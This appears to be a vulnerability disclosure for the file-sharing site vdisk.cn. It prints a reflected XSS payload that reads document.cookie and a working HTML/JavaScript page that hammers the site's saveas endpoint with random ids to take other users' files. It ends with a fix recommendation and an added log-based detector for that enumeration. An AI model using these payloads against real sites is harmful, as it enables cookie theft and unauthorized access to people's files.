Weipan (vdisk.cn) lets users upload files without registering (the system creates an account automatically) and without any capacity limit; downloading is easy, so it has many users.
1. XSS: Weipan's search function contains a typical reflected XSS in the search form:
http://www.vdisk.cn/tempuser1334906450?s=%22+onmouseover%3Djavascript%3Aalert%28document.cookie%29%3E
2. Saving anyone's file to your own favorites (arbitrary favorites):
Every file in Weipan is numbered, for example http://www.vdisk.cn/down/index/10016545. Open it and wait 10 seconds for the advertisement (to skip the wait, clear the address bar and enter javascript:document.getElementById('loadingbox').style.display='none';document.getElementById('btnbox').style.display='block';), after which a "Save to my disk" button appears; click it to save the file. If you do not have a Weipan account, simply upload any file and Weipan automatically assigns you one, such as tempuser1334905592. The relevant code I saw is the following:
var loadcount = 1;
function saveas(id) {
    if (jQuery.cookie('uid') == null) {
        alert('You have not logged in yet; please click Login in the upper right corner or register for free.');
    } else {
        $.ajaxSetup({async: true, cache: false, type: "GET"});
        $.getJSON('/json/saveas?id=' + id, '',
            function (json) {
                if (json.result != true) { alert(json.msg); }
                else { if (confirm("The file has been copied and saved successfully. Go to your disk now?")) location = '/user/admin/' + jQuery.cookie('userid'); }
            });
    }
}
$().ready(function () {
    setTimeout("document.getElementById('loadingbox').style.display='none';document.getElementById('btnbox').style.display='block';", 10000);
});
The "save as" button calls the saveas(id) function. Its core is the request to http://www.vdisk.cn/json/saveas?id=<id>, which asynchronously adds the file with that id to your account in the background. This is the basis of arbitrary favorites: if you write a tool that opens this link at intervals, ids are 7-8 digit numbers (minimum 3440540, maximum 10018135), so your temporary account will soon hold (?) file entries from all over Weipan.
Code:
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/>
<title>Weipan favorites</title>
<style type="text/css">
<!--
body, td, th {
    font-size: 24px;
    color: #FF6;
}
body {
    background-color: #366;
    margin-left: 20px;
    margin-top: 20px;
    margin-right: 20px;
    margin-bottom: 20px;
}
a {color: #FFF}
-->
</style>
</head>
<body>
<script>
var s = '';
function shua() {
    setTimeout("shua()", 1000);
    s = "http://www.vdisk.cn/json/saveas?id=" + eval(Math.round(Math.random() * 6577595) + 3440540);
    document.getElementById("my").src = s;
    document.getElementById("t").innerHTML = "<a href=" + s + ">" + s + "</a><br/>";
}
shua();
</script>
<p>
Favorites: <span id="t"></span>
</p>
<iframe id="my" width="80%"></iframe>
</body>
</html>
Account used to test the arbitrary-favorites effect:
http://www.vdisk.cn/tempuser1334839579
Solution:
Add permission checks to the save operation; otherwise the server will be compromised.
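A defender-side check for this bug, added here and not part of the original writeup: given access-log lines for the saveas endpoint, it flags accounts that request many distinct file ids within a short window, the pattern produced by the one-request-per-second loop above, while an account that saves a couple of files by hand is not flagged. The log line layout, the uid field and the sample lines are assumptions constructed for this example.

```javascript
// Added detection example (not from the original writeup). The log line layout and
// the uid field are assumed: <ip> [<unix ts>] "<request>" <status> uid=<uid>
const SAVEAS_RE = /^(\S+) \[(\d+)\] "GET \/json\/saveas\?id=(\d+)[^"]*" (\d{3}) uid=(\S+)$/;

// Parse one log line; returns null for anything that is not a saveas call.
function parseSaveasLine(line) {
  const m = SAVEAS_RE.exec(line);
  if (!m) return null;
  return { ip: m[1], ts: Number(m[2]), id: m[3], status: Number(m[4]), uid: m[5] };
}

// For each uid, find the largest number of distinct file ids requested inside any
// window of `windowSec` seconds, and return the uids whose peak reaches `threshold`.
function findEnumeratingUids(lines, { windowSec = 60, threshold = 20 } = {}) {
  const byUid = new Map();
  for (const line of lines) {
    const e = parseSaveasLine(line);
    if (!e) continue;
    if (!byUid.has(e.uid)) byUid.set(e.uid, []);
    byUid.get(e.uid).push(e);
  }
  const flagged = {};
  for (const [uid, events] of byUid) {
    events.sort((a, b) => a.ts - b.ts);
    const inWindow = new Map(); // id -> occurrences currently inside the sliding window
    let start = 0, peak = 0;
    for (let end = 0; end < events.length; end++) {
      inWindow.set(events[end].id, (inWindow.get(events[end].id) || 0) + 1);
      while (events[end].ts - events[start].ts > windowSec) {
        const old = events[start++].id;
        if (inWindow.get(old) === 1) inWindow.delete(old); else inWindow.set(old, inWindow.get(old) - 1);
      }
      peak = Math.max(peak, inWindow.size);
    }
    if (peak >= threshold) flagged[uid] = peak;
  }
  return flagged;
}

// Constructed sample: one temporary account calls saveas once a second with scattered
// ids (the loop described above); another saves two files by hand, 90 seconds apart.
function sampleLog() {
  const lines = [];
  for (let i = 0; i < 30; i++) {
    lines.push(`10.0.0.5 [${1334839600 + i}] "GET /json/saveas?id=${3440540 + i * 97} HTTP/1.1" 200 uid=tempuser1334839579`);
  }
  lines.push('10.0.0.9 [1334839610] "GET /json/saveas?id=10016545 HTTP/1.1" 200 uid=tempuser1334905592');
  lines.push('10.0.0.9 [1334839700] "GET /json/saveas?id=10016546 HTTP/1.1" 200 uid=tempuser1334905592');
  lines.push('10.0.0.9 [1334839705] "GET /down/index/10016546 HTTP/1.1" 200 uid=tempuser1334905592');
  return lines;
}
```

Running `findEnumeratingUids(sampleLog())` flags only tempuser1334839579 with a peak of 30 distinct ids; the same check can be applied per source IP when temporary accounts are rotated.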
Author: 4th